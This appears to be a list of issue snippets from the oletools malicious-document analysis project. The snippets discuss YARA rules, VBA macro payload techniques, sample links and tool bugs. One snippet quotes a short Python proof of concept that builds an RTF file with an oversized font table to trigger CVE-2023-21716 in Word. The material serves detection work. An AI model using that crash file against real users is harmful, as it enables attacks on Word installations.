Philippe Lagadec
Philippe Lagadec
See https://twitter.com/SI_FalconTeam/status/1633114934253965314 (YARA rule) Another YARA rule: https://github.com/AmgdGocha/Detection-Rules/blob/main/CVE-2023-21716.yar PoC: https://twitter.com/jduck/status/1632471544935923712 ``` open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8')) ``` See also https://github.com/gyaansastra/CVE-2023-21716
check all the keywords mentioned in https://www.countercept.com/blog/dechaining-macros-and-evading-edr
See https://inquest.net/blog/2022/10/03/hiding-xml for an example of VBA macro using CustomXML to store a payload. Also a new keyword `ActiveDocument.CustomXMLParts` to be added: https://learn.microsoft.com/en-us/office/vba/api/Office.CustomXMLParts
Today the tests running on PyPy 2 trigger the following error on PyPy 2 (but not CPython 2): ``` /home/travis/virtualenv/pypy2.7-7.1.1/site-packages/msoffcrypto/method/rc4.py:5: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python...
See https://isc.sans.edu/diary/29174 Sample: https://bazaar.abuse.ch/sample/1c8cfccd2e45ea898125a62686ee97a1e923dfbbc8652889027d46b04aa5dc75/
example (technique used by icedid): https://twitter.com/filescan_itsec/status/1575841289718874115 https://isc.sans.edu//forums/diary/Word+Maldoc+With+CustomXML+and+Renamed+VBAProjectbin/29056/
When running oleobj on a PPT 97-2003 file (e.g. https://www.hybrid-analysis.com/sample/d1bceccf5d2b900a6b601c612346fdb3fa5bb0e2faeefcac3f9c29dc1d74838d/631b2c1d8501f5745e1ca88d), oleobj tries to parse it as an OpenXML file and triggers exceptions: ``` oleobj 0.60.1.dev5 - http://decalage.info/oletools THIS IS WORK...
This PR was automatically created by Snyk using the credentials of a real user.Snyk has created this PR to fix one or more vulnerable packages in the `pip` dependencies of...
https://cyber.gouv.fr/publications/guide-dhygiene-informatique
to scan containers (public docker images) for vulnerabilities: https://containercve.com/ based on https://github.com/aquasecurity/trivy